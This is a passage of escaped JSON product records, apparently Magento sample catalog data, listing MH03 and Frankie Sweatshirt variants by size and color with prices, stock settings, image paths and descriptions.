Search\",\"price\":\"63\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Organic Cotton,pattern=Solid,climate=All-weather|Cool|Indoor|Spring|Windy,eco_collection=Yes,performance_fabric=No,erin_recommends=Yes,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH03-XS-Black,size=XS,color=Black|sku=MH03-XS-Blue,size=XS,color=Blue|sku=MH03-XS-Green,size=XS,color=Green|sku=MH03-S-Black,size=S,color=Black|sku=MH03-S-Blue,size=S,color=Blue|sku=MH03-S-Green,size=S,color=Green|sku=MH03-M-Black,size=M,color=Black|sku=MH03-M-Blue,size=M,color=Blue|sku=MH03-M-Green,size=M,color=Green|sku=MH03-L-Black,size=L,color=Black|sku=MH03-L-Blue,size=L,color=Blue|sku=MH03-L-Green,size=L,color=Green|sku=MH03-XL-Black,size=XL,color=Black|sku=MH03-XL-Blue,size=XL,color=Blue|sku=MH03-XL-Green,size=XL,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh03-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh03-black_alt1.jpg,\\/m\\/h\\/mh03-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Indoor|Spring|Windy\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"Yes\",\"sale\":\"No\"},{\"sku\":\"MH04-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-XS-Green\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},{\"sku\":\"MH04-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-XS-White\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},{\"sku\":\"MH04-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-XS-Yellow\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},{\"sku\":\"MH04-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-S-Green\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},{\"sku\":\"MH04-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-S-White\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},{\"sku\":\"MH04-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-S-Yellow\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},{\"sku\":\"MH04-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-M-Green\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"image\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh04-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh04-green_alt1.jpg,\\/m\\/h\\/mh04-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},{\"sku\":\"MH04-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Frankie  Sweatshirt-M-White\",\"description\":\"<p>The Frankie Sweatshirt is your best friend at long afternoon stadium stints or winter trailside campsites. The soft fleece fabric keeps you toasty as moisture-wicking technology kicks in when the sun comes out.<\\/p>\\n<p>&bull; Light green crewneck sweatshirt.<br \\/>&bull; Hand pockets.<br \\/>&bull; Relaxed fit.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"frankie-sweatshirt-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh04-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"co